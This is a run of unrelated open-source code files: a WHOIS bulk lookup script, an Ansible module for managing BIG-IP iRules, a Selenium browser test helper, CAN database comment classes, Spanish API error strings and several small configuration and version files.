return self.record_delim.join([self.leader, self.record_delim.join(ip_list), \
self.footer]) + self.record_delim
if __name__ == "__main__":
lookups = ["201.21.203.254", "203.21.203.254", "130.102.6.192", "192.168.0.10", "203.20.1.2", "200.200.200.200", "8.8.8.8"]
bw = BulkWhois(leader="begin origin")
bw.field_names=["ip", "asn", "bgp_prefix", "as_name", "cc", "register", "org_name"]
print bw.lookup_ips_raw(lookups)
print bw.lookup_ips(lookups)
bw2 = BulkWhois(leader="begin\nverbose", server="asn.cymru.coma")
bw2.field_names=["asn", "ip", "bgp_prefix", "cc", "registry", "allocated", "as_name"]
print bw2.lookup_ips_raw(lookups)
print bw2.lookup_ips(lookups)
| 34.793296 | 127 | 0.581728 |
4a1e33cbb1d94b8d8f563aa9996d50c6e85a125e | 149 | py | Python | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 29 | 2020-03-26T08:25:14.000Z | 2022-03-14T08:44:39.000Z | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 35 | 2020-05-12T06:21:03.000Z | 2022-03-04T10:32:19.000Z | tests/integration/omnicore_types.py | johng/obd | 1d1ef45adc2e6cec82afc6d03efcf2cd53751c2a | [
"MIT"
] | 12 | 2020-05-18T21:02:13.000Z | 2022-03-25T13:44:46.000Z | from dataclasses import dataclass
@dataclass(frozen=False)
class Address:
public_key: str
private_key: str
address: str
index: int
| 14.9 | 33 | 0.718121 |
4a1e33cea933d5c3a1089d13cc6ee90e4658a5ba | 553 | py | Python | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | digideskio/dataservices-api | 246ec135dbeaa3f9a52717fdac50a4ab040ce22b | [
"BSD-3-Clause"
] | 22 | 2016-03-11T17:33:31.000Z | 2021-02-22T04:00:43.000Z | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | digideskio/dataservices-api | 246ec135dbeaa3f9a52717fdac50a4ab040ce22b | [
"BSD-3-Clause"
] | 338 | 2016-02-16T16:13:13.000Z | 2022-03-30T15:50:17.000Z | server/lib/python/cartodb_services/cartodb_services/refactor/backend/server_config.py | CartoDB/dataservices-api | d0f28cc002ef11df9f371d5d1fd2d0901c245f97 | [
"BSD-3-Clause"
] | 14 | 2016-09-22T15:29:33.000Z | 2021-02-08T03:46:40.000Z | from cartodb_services.refactor.storage.server_config import InDbServerConfigStorage
class ServerConfigBackendFactory(object):
"""
This class creates a backend to retrieve server configurations (implementing the ConfigBackendInterface).
At this moment it will always return an InDbServerConfigStorage, but nothing prevents from changing the
implementation. To something that reads from a file, memory or whatever. It is mostly there to keep
the layers separated.
"""
def get(self):
return InDbServerConfigStorage()
| 39.5 | 109 | 0.777577 |
4a1e33ee5ed0739a445e4048fcddce18aac6d4c7 | 631 | py | Python | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | gazoo_device/_version.py | dedsec-9/gazoo-device | 5ed2867c258da80e53b6aae07ec7a65efe473a28 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gazoo Device Manager version."""
version = "1.33.0"
| 37.117647 | 74 | 0.751189 |
4a1e3430abe789126ea345c97d4cde1997f8ab5d | 1,107 | py | Python | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-25T03:22:52.000Z | 2017-11-25T03:22:52.000Z | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robotide/context/coreplugins.py | nbbull/RIDE | e6496f0b1b6dc454b9479de48b6949bce29b53df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def get_core_plugins():
from robotide.run import RunAnything
from robotide.recentfiles import RecentFilesPlugin
from robotide.ui.preview import PreviewPlugin
from robotide.ui.keywordsearch import KeywordSearch
from robotide.editor import EditorPlugin
from robotide.editor.texteditor import TextEditorPlugin
from robotide.log import LogPlugin
return [RunAnything, RecentFilesPlugin, PreviewPlugin,
EditorPlugin, TextEditorPlugin, KeywordSearch, LogPlugin]
| 41 | 75 | 0.769648 |
4a1e344baa9d52ad1255402d81c02e71a023d18a | 337 | py | Python | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | null | null | null | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | 17 | 2018-03-07T15:52:42.000Z | 2022-03-12T01:07:06.000Z | cradmin_legacy/demo/no_role_demo/views/dashboard.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | [
"BSD-3-Clause"
] | 1 | 2018-07-23T22:13:45.000Z | 2018-07-23T22:13:45.000Z | from __future__ import unicode_literals
from django.views.generic import TemplateView
from cradmin_legacy import crapp
class DashboardView(TemplateView):
template_name = 'no_role_demo/dashboard.django.html'
class App(crapp.App):
appurls = [
crapp.Url(r'^$', DashboardView.as_view(), name=crapp.INDEXVIEW_NAME)
]
| 22.466667 | 76 | 0.753709 |
4a1e355ecd84746004ec1d71828260fe8319de29 | 8,053 | py | Python | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | 2 | 2016-11-11T21:46:23.000Z | 2016-11-14T08:06:38.000Z | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | null | null | null | src/library/bigip_irule_bigsuds.py | SpringerPE/ansible-bigiplb-boshrelease | 44835946c3513cbf1a975a895eb652261deffbba | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
DOCUMENTATION = '''
---
module: bigip_irule_bigsuds
short_description: Manage iRules on a BIG-IP.
description:
- Manage iRules on a BIG-IP.
version_added: "2.2"
notes:
- "Requires BIG-IP software version >= 9"
- "F5 developed module 'bigsuds' required (see http://devcentral.f5.com)"
- "Best run as a local_action in your playbook"
- "Inspired by the `bigip_virtual_server` module by Etienne Carriere (@Etienne-Carriere) and Tim Rupp (@caphrim007)"
requirements:
- bigsuds
author:
- Ryan Conway (@rylon)
options:
content:
description:
- When used instead of 'src', sets the contents of an iRule directly to
the specified value. This is for simple values, but can be used with
lookup plugins for anything complex or with formatting. Either one
of C(src) or C(content) must be provided.
partition:
description:
- The partition to create the iRule in.
required: false
default: Common
name:
description:
- The name of the iRule.
required: true
src:
description:
- The iRule file to interpret and upload to the BIG-IP. Either one
of C(src) or C(content) must be provided.
required: true
state:
description:
- Whether the iRule should exist or not.
required: false
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
'''
EXAMPLES = '''
- name: Add an irule with inline content
delegate_to: localhost
bigip_irule_bigsuds:
state: "present"
server: "lb.mydomain.com"
validate_certs: false
user: "username"
password: "password"
partition: "my_partition"
name: "my_irule"
content: "when HTTP_REQUEST { HTTP::header insert "MY_TEST_HEADER" "testing" }"
- name: Add an irule by reading from a specific file
delegate_to: localhost
bigip_irule_bigsuds:
state: "present"
server: "lb.mydomain.com"
validate_certs: false
user: "username"
password: "password"
partition: "my_partition"
name: "my_irule"
src: "/path/to/rule.tcl"
'''
RETURN = '''
action:
description: Shows the type of modification made, if there were changes, for example "updated", "deleted", "created"
returned: changed
type: string
sample: "updated"
irule_name:
description: The fully qualified irule name
returned: changed and success
type: string
sample: "/my_partition/my_irule"
'''
def irule_exists(api, name):
result = False
try:
api.LocalLB.Rule.query_rule(rule_names=[name])
result = True
except bigsuds.OperationFailed as e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def irule_create(api, name, content):
api.LocalLB.Rule.create(rules=[ {'rule_name': name, 'rule_definition': content} ])
def irule_update(api, name, content, diff_enabled):
updated = {'changed': False, 'irule_name': name}
existing_irule = irule_get(api, name)
if existing_irule['rule_definition'] != content:
api.LocalLB.Rule.modify_rule(rules=[ {'rule_name': name, 'rule_definition': content} ])
updated['changed'] = True
updated['action'] = 'updated'
if diff_enabled:
updated['diff'] = {
'before_header': name,
'before': existing_irule['rule_definition'],
'after_header': name,
'after': content
}
return updated
def irule_get(api, name):
# Example response: [{'rule_name': '/my_partition/my_irule', 'rule_definition': '<irule code goes here>'}]
return api.LocalLB.Rule.query_rule(rule_names=[name])[0]
def irule_remove(api, name):
api.LocalLB.Rule.delete_rule(rule_names=[name])
def main():
argument_spec = f5_argument_spec()
argument_spec.update(dict(
state=dict(type='str', default='present',
choices=['present', 'absent']),
name=dict(type='str', required=True),
content=dict(required=False, default=None),
src=dict(required=False, default=None),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['content', 'src']
]
)
if not bigsuds_found:
module.fail_json(msg="the python bigsuds module is required")
if module.params['validate_certs']:
import ssl
if not hasattr(ssl, 'SSLContext'):
module.fail_json(msg='bigsuds does not support verifying certificates with python < 2.7.9. Either update python or set validate_certs=False on the task')
server = module.params['server']
server_port = module.params['server_port']
user = module.params['user']
password = module.params['password']
partition = module.params['partition']
validate_certs = module.params['validate_certs']
state = module.params['state']
name = fq_name(partition, module.params['name']) # Fully Qualified name (including the partition)
# Irule contents can either be defined inline via 'content' attribute, or by passing the path to
# a file via 'src' attribute, for the latter we need to read those contents from the file.
content = None
if module.params['src']:
try:
with open(module.params['src']) as f:
content = f.read()
except Exception as e:
raise Exception('Error reading iRule "src" file : %s' % e)
else:
content = module.params['content']
try:
api = bigip_api(server, user, password, validate_certs, port=server_port)
result = {'changed': False, 'irule_name': name} # default module return value
if state == 'absent':
# Check mode is disabled
if not module.check_mode:
if irule_exists(api, name):
try:
irule_remove(api, name)
result = {'changed': True, 'action': 'deleted'}
except bigsuds.OperationFailed as e:
# Handles the situation where the irule was deleted in between us querying for its existence and running the delete command.
if "was not found" in str(e):
result['changed'] = False
else:
raise
# Check mode is enabled
else:
result = {'changed': True}
# State is 'present'
else:
# Check mode is disabled
if not module.check_mode:
# If the irule doesn't exist we can create it.
if not irule_exists(api, name):
try:
irule_create(api, name, content)
result = {'changed': True, 'action': 'created'}
except Exception as e:
raise Exception('Error creating iRule : %s' % e)
# The irule already exists so we need to check if it has the correct content
# and update it only if necessary, so Ansible can report 'changed' correctly.
else:
try:
result = irule_update(api, name, content, module._diff)
except Exception as e:
raise Exception("Error updating iRule : %s" % e)
# Check mode is disabled
else:
# check-mode return value
result = {'changed': True}
except Exception as e:
module.fail_json(msg="Received exception: %s" % e)
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
if __name__ == '__main__':
main()
| 32.603239 | 166 | 0.594934 |
4a1e365eb6623694467025066d11c95f56a7bafe | 2,523 | py | Python | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 92 | 2018-08-29T12:35:55.000Z | 2022-03-21T01:18:57.000Z | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 111 | 2018-08-15T12:17:44.000Z | 2022-03-09T19:31:33.000Z | service/strings.py | BetssonGroup/georef-ar-api | 15a408912633c802f6d67a357c92a26dd3537396 | [
"MIT"
] | 20 | 2018-08-23T17:19:09.000Z | 2021-12-15T19:36:54.000Z | """Módulo 'strings' de georef-ar-api
Contiene mensajes de error en forma de texto para usuarios.
"""
ADDRESS_FORMAT = 'La dirección debe seguir alguno de los formatos listados \
bajo la clave \'ayuda\'.'
ADDRESS_FORMAT_HELP = [
'<nombre de calle>',
'<nombre de calle> <altura>'
]
STRING_EMPTY = 'El campo no tiene contenido.'
INT_VAL_ERROR = 'El parámetro no es un número entero.'
FLOAT_VAL_ERROR = 'El parámetro no es un número real.'
INVALID_CHOICE = 'El parámetro debe tomar el valor de uno de los listados \
bajo la clave \'ayuda\'.'
INVALID_BULK = 'Las operaciones deben estar contenidas en una lista no vacía \
bajo la clave \'{}\'.'
BULK_QS_INVALID = 'No se permiten parámetros vía query string en operaciones \
bulk.'
INVALID_BULK_ENTRY = 'Las operaciones bulk deben ser de tipo objeto.'
INTERNAL_ERROR = 'Ocurrió un error interno de servidor al procesar la \
petición.'
MISSING_ERROR = 'El parámetro \'{}\' es obligatorio.'
UNKNOWN_ERROR = 'El parámetro especificado no existe. Los parámetros \
aceptados están listados bajo la clave \'ayuda\'.'
REPEATED_ERROR = 'El parámetro está repetido.'
BULK_LEN_ERROR = 'El número máximo de operaciones bulk es: {}.'
INT_VAL_SMALL = 'El número debe ser igual o mayor que {}.'
INT_VAL_BIG = 'El número debe ser menor o igual que {}.'
INT_VAL_BIG_GLOBAL = 'La suma de parámetros {} debe ser menor o igual \
que {}.'
NOT_FOUND = 'No se encontró la URL especificada.'
NOT_ALLOWED = 'Método no permitido en el recurso seleccionado.'
ID_PARAM_INVALID = 'Cada ID debe ser numérico y de longitud {}.'
ID_PARAM_LENGTH = 'La cantidad de ID debe ser menor o igual que {}.'
ID_PARAM_UNIQUE = 'La lista no debe contener ID repetidos (ID repetido: {}).'
COMPOUND_PARAM_ERROR = 'El valor del parámetro no es válido.'
FIELD_LIST_EMPTY = 'La lista no contiene valores.'
FIELD_LIST_REPEATED = 'La lista contiene valores repetidos.'
FIELD_LIST_INVALID_CHOICE = 'El parámetro debe consistir en una lista de \
ítems separados por comas. Los valores posibles de los ítems se listan bajo \
la clave \'ayuda\'. Alternativamente, se pueden especificar los valores \
\'basico\', \'estandar\' o \'completo\'.'
FIELD_INTERSECTION_FORMAT = 'El parámetro debe seguir el siguiente formato: \
<tipo de entidad>:<id>, <tipo de entidad>:<id>, ... (ver ejemplos bajo la \
clave ayuda).'
FIELD_INTERSECTION_FORMAT_HELP = [
'provincia:94:38',
'municipio:740038, departamento:74049',
'departamento:62035:62007:62084',
'municipio:700070:700049, provincia:02',
'departamento:14028'
]
| 45.872727 | 78 | 0.742767 |
4a1e3679a683cb0391108e789817e80e75de1b93 | 8,270 | py | Python | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 21 | 2017-10-08T23:19:47.000Z | 2020-01-16T20:02:08.000Z | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 6 | 2020-06-03T05:30:52.000Z | 2022-01-13T00:44:26.000Z | tools/browser.py | adelsonllima/djangoplus | a4ce50bf8231a0d9a4a40751f0d076c2e9931f44 | [
"BSD-3-Clause"
] | 9 | 2017-10-09T22:58:31.000Z | 2021-11-20T15:20:18.000Z | # -*- coding: utf-8 -*-
import time
import datetime
import traceback
import djangoplus
from selenium import webdriver
from django.conf import settings
from django.utils.translation import ugettext as _
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import WebDriverException
class Browser(webdriver.Firefox):
def __init__(self, server_url, options=None, verbose=True, slowly=False, maximize=True, headless=False):
if not options:
options = Options()
if maximize:
options.add_argument("--start-maximized")
else:
options.add_argument("--window-size=720x800")
if headless or djangoplus.test.CACHE['HEADLESS']:
options.add_argument("--headless")
super(Browser, self).__init__(options=options)
self.verbose = verbose
self.slowly = slowly
self.watched = False
self.server_url = server_url
if maximize:
self.maximize_window()
else:
self.set_window_position(700, 0)
self.set_window_size(720, 800)
self.switch_to.window(self.current_window_handle)
def slow_down(self):
self.slowly = True
def speed_up(self):
self.slowly = False
def wait(self, seconds=1):
time.sleep(seconds)
def watch(self, e):
if self.watched:
raise e
else:
traceback.print_exc()
self.watched = True
self.save_screenshot('/tmp/test.png')
if not djangoplus.test.CACHE['HEADLESS']:
input('Type enter to continue...')
def print(self, message):
if self.verbose:
print(message)
def execute_script(self, script, *args):
super(Browser, self).execute_script(script, *args)
if self.slowly:
self.wait(3)
def open(self, url):
self.get("{}{}".format(self.server_url, url))
def back(self, seconds=None):
if seconds:
self.wait(seconds)
if not self.current_url or not self.current_url.endswith('/admin/'):
self.open('/admin/')
def enter(self, name, value, submit=False, count=2):
if callable(value):
value = value()
if type(value) == datetime.date:
value = value.strftime('%d/%m/%Y')
if value:
self.print('{} "{}" for "{}"'.format('Entering', value, name))
try:
if submit:
self.execute_script("enter('{}', '{}', 1)".format(name, value))
else:
self.execute_script("enter('{}', '{}')".format(name, value))
elements = self.find_elements_by_name('hidden-upload-value')
for element in elements:
element_id, file_path = element.get_property('value').split(':')
if file_path.startswith('/static'):
file_path = '{}/{}/{}'.format(settings.BASE_DIR, settings.PROJECT_NAME, file_path)
self.find_element_by_id(element_id).send_keys(file_path)
except WebDriverException as e:
if count:
self.wait()
self.enter(name, value, submit, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def choose(self, name, value, count=2):
self.print('{} "{}" for "{}"'.format('Choosing', value, name))
try:
headless = djangoplus.test.CACHE['HEADLESS'] and 'true' or 'false'
self.execute_script("choose('{}', '{}', {})".format(name, value, headless))
self.wait(2)
except WebDriverException as e:
if count:
self.wait()
self.choose(name, value, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def dont_see_error_message(self, testcase=None):
elements = self.find_elements_by_class_name('alert-danger')
if elements:
messages = [element.text for element in elements]
if not djangoplus.test.CACHE['HEADLESS']:
input('Type enter to continue...')
elif testcase:
exception_message = 'The following messages were found on the page: {}'.format(';'.join(messages))
raise testcase.failureException(exception_message)
def see(self, text, flag=True, count=2):
if flag:
self.print('See "{}"'.format(text))
try:
assert text in self.find_element_by_tag_name('body').text
except WebDriverException as e:
if count:
self.wait()
self.see(text, flag, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
else:
self.print('Can\'t see "{}"'.format(text))
assert text not in self.find_element_by_tag_name('body').text
def look_at_popup_window(self, count=2):
self.print('Looking at popup window')
try:
self.execute_script("lookAtPopupWindow()")
except WebDriverException as e:
if count:
self.wait()
self.look_at_popup_window(count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def look_at(self, text, count=2):
self.print('Loking at "{}"'.format(text))
try:
self.execute_script("lookAt('{}')".format(text))
except WebDriverException as e:
if count:
self.wait()
self.look_at(text, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def look_at_panel(self, text, count=2):
self.print('Looking at panel "{}"'.format(text))
try:
self.execute_script("lookAtPanel('{}')".format(text))
except WebDriverException as e:
if count:
self.wait()
self.look_at_panel(text, count-1)
else:
self.watch(e)
if self.slowly:
self.wait(2)
def check(self, text=None):
self.print('Checking "{}"'.format(text))
try:
if text:
self.execute_script("check('{}')".format(text))
else:
self.execute_script("check()")
except WebDriverException as e:
self.watch(e)
self.wait()
def click_menu(self, *texts):
self.print('Clicking menu "{}"'.format('->'.join(texts)))
self.wait()
for text in texts:
self.wait()
try:
self.execute_script("clickMenu('{}')".format(text.strip()))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_link(self, text):
self.print('Clicking link "{}"'.format(text))
try:
self.execute_script("clickLink('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_button(self, text):
self.print('Clicking button "{}"'.format(text))
try:
self.execute_script("clickButton('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
self.dont_see_error_message()
def click_tab(self, text):
self.print('Clicking tab "{}"'.format(text))
try:
self.execute_script("clickTab('{}')".format(text))
except WebDriverException as e:
self.watch(e)
self.wait()
def click_icon(self, name):
self.print('Clicking icon "{}"'.format(name))
try:
self.execute_script("clickIcon('{}')".format(name))
except WebDriverException as e:
self.watch(e)
self.wait()
def logout(self):
self.print('Logging out')
self.click_icon(_('Settings'))
self.wait()
self.click_link(_('Logout'))
self.wait()
def close(self, seconds=0):
self.wait(seconds)
super(Browser, self).close()
| 32.948207 | 114 | 0.542443 |
4a1e372600e415f6c95a0a392afb3a06743da406 | 2,345 | py | Python | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | scout/build/genes/exon.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | from scout.models.hgnc_map import Exon
def build_exon(exon_info, build='37'):
"""Build a Exon object object
Args:
exon_info(dict): Exon information
Returns:
exon_obj(Exon)
"exon_id": str, # str(chrom-start-end)
"chrom": str,
"start": int,
"end": int,
"transcript": str, # ENST ID
"hgnc_id": int, # HGNC_id
"rank": int, # Order of exon in transcript
"strand": int, # 1 or -1
"build": str, # Genome build
"""
try:
ensembl_exon_id = exon_info['ens_exon_id']
except KeyError:
raise KeyError("Exons has to have a ensembl_exon_id")
try:
chrom = str(exon_info['chrom'])
except KeyError:
raise KeyError("Exons has to have a chromosome")
try:
start = int(exon_info['start'])
except KeyError:
raise KeyError("Exon has to have a start")
except TypeError:
raise TypeError("Exon start has to be integer")
try:
end = int(exon_info['end'])
except KeyError:
raise KeyError("Exon has to have a end")
except TypeError:
raise TypeError("Exon end has to be integer")
try:
rank = int(exon_info['rank'])
except KeyError:
raise KeyError("Exon has to have a rank")
except TypeError:
raise TypeError("Exon rank has to be integer")
try:
strand = int(exon_info['strand'])
except KeyError:
raise KeyError("Exon has to have a strand")
except TypeError:
raise TypeError("Exon strand has to be integer")
try:
exon_id = exon_info['exon_id']
except KeyError:
raise KeyError("Exons has to have a id")
try:
transcript = exon_info['transcript']
except KeyError:
raise KeyError("Exons has to have a transcript")
try:
hgnc_id = int(exon_info['hgnc_id'])
except KeyError:
raise KeyError("Exons has to have a hgnc_id")
except TypeError:
raise TypeError("hgnc_id has to be integer")
exon_obj = Exon(
exon_id = exon_id,
chrom = chrom,
start = start,
end = end,
strand = strand,
rank = rank,
transcript = transcript,
hgnc_id = hgnc_id,
build = build,
)
return exon_obj
| 25.769231 | 61 | 0.575267 |
4a1e372775f4def9dca81077b789373539d19ef5 | 384 | py | Python | languages/python/1.learn_py_the_hard_way/ex10.py | banminkyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | 4 | 2022-01-18T00:57:20.000Z | 2022-03-31T02:41:54.000Z | languages/python/1.learn_py_the_hard_way/ex10.py | kyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | null | null | null | languages/python/1.learn_py_the_hard_way/ex10.py | kyoz/learn | fde05b0e2f075ebffe77a9d085ed63412d8a9ff9 | [
"MIT"
] | null | null | null | print("I am 6'2\" tall.") # escape double-quote inside string
print('I am 6\'2" tall.') # escape single-quote inside string
tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = """
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
"""
print(tabby_cat)
print(persian_cat)
print(backslash_cat)
print(fat_cat)
| 20.210526 | 61 | 0.671875 |
4a1e372f4ac45d55da35c2f37f647db6c5887eae | 1,600 | py | Python | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | app/core/filters.py | samgans/Recipe-API | 47f9566cef60c45f0b57c032d19d7238f6e88e07 | [
"MIT"
] | null | null | null | from rest_framework import filters
class IsOwnerFilterBackend(filters.BaseFilterBackend):
'''Filters objects which were created by the request user'''
def filter_queryset(self, request, queryset, view):
return queryset.filter(owner=request.user)
class RecipeTagsFilterBackend(filters.BaseFilterBackend):
'''Filters recipes by the tags'''
def filter_queryset(self, request, queryset, view):
tags_str = request.query_params.get('tags')
if tags_str:
list_tags = [int(i) for i in tags_str.split(',')]
return queryset.filter(tags__id__in=list_tags)
return queryset
class RecipeIngredientsFilterBackend(filters.BaseFilterBackend):
'''Filters recipes by the ingredients'''
def filter_queryset(self, request, queryset, view):
ingr_str = request.query_params.get('ingredients')
if ingr_str:
list_ingrs = [int(i) for i in ingr_str.split(',')]
return queryset.filter(ingredients__id__in=list_ingrs)
return queryset
class AssignedToRecipeFilterBackend(filters.BaseFilterBackend):
'''
Filters tag or ingredient by the fact that it assigned or not to a recipe
'''
def filter_queryset(self, request, queryset, view):
assigned = (request.query_params.get('assigned') == '1')
not_assigned = (request.query_params.get('not_assigned') == '1')
if assigned:
return queryset.filter(recipe__isnull=False).distinct()
elif not_assigned:
return queryset.filter(recipe__isnull=True).distinct()
return queryset
| 37.209302 | 77 | 0.69 |
4a1e375bbf8ed093e6c3be533314b03509139695 | 2,711 | py | Python | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | 8 | 2021-02-18T07:16:16.000Z | 2022-03-23T11:55:52.000Z | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | null | null | null | vector_dbc/comment.py | kdschlosser/vector_dbc | c49efa538ed9683d6257182fa7515cd40a0ff5a1 | [
"MIT"
] | 3 | 2021-02-19T14:27:34.000Z | 2022-03-23T11:55:53.000Z |
class Comment(str):
_fmt = 'CM_ "{comment}" ;'
def format(self, *args, **kwargs):
return self._fmt.format(comment=self.replace('"', '\\"'))
class NodeComment(Comment):
_fmt = 'CM_ BU_ {name} "{comment}" ;'
def __init__(self, value):
self._node = None
try:
super(NodeComment, self).__init__(value)
except TypeError:
super(NodeComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
name=self._node.name,
comment=self.replace('"', '\\"')
)
@property
def node(self):
return self._node
@node.setter
def node(self, value):
self._node = value
class MessageComment(Comment):
_fmt = 'CM_ BO_ {frame_id} "{comment}" ;'
def __init__(self, value):
self._message = None
try:
super(MessageComment, self).__init__(value)
except TypeError:
super(MessageComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
frame_id=self._message.dbc_frame_id,
comment=self.replace('"', '\\"')
)
@property
def message(self):
return self._message
@message.setter
def message(self, value):
self._message = value
class SignalComment(Comment):
_fmt = 'CM_ SG_ {frame_id} {name} "{comment}";'
def __init__(self, value):
self._signal = None
try:
super(SignalComment, self).__init__(value)
except TypeError:
super(SignalComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
frame_id=self._signal.message.dbc_frame_id,
name=self._signal.name,
comment=self.replace('"', '\\"')
)
@property
def signal(self):
return self._signal
@signal.setter
def signal(self, value):
self._signal = value
class EnvironmentVariableComment(Comment):
_fmt = 'CM_ EV_ {name} "{comment}";'
def __init__(self, value):
self._environment_variable = None
try:
super(EnvironmentVariableComment, self).__init__(value)
except TypeError:
super(EnvironmentVariableComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
name=self._environment_variable.name,
comment=self.replace('"', '\\"')
)
@property
def environment_variable(self):
return self._environment_variable
@environment_variable.setter
def environment_variable(self, value):
self._environment_variable = value
| 23.99115 | 67 | 0.586868 |
4a1e3906025e5d5a9b26ab847bd9ca06719be68a | 2,239 | py | Python | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def wage1(path):
"""wage1
Data loads lazily. Type data(wage1) into the console.
A data.frame with 526 rows and 24 variables:
- wage. average hourly earnings
- educ. years of education
- exper. years potential experience
- tenure. years with current employer
- nonwhite. =1 if nonwhite
- female. =1 if female
- married. =1 if married
- numdep. number of dependents
- smsa. =1 if live in SMSA
- northcen. =1 if live in north central U.S
- south. =1 if live in southern region
- west. =1 if live in western region
- construc. =1 if work in construc. indus.
